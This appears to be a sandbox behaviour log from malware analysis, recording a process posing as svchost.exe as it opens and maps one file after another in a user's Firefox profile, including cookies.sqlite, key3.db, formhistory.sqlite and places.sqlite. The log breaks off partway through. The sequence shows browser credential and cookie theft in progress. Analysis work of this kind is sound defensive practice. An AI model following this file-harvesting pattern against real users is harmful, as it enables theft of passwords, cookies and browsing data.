Ini Read file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 1 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0 False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0 False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
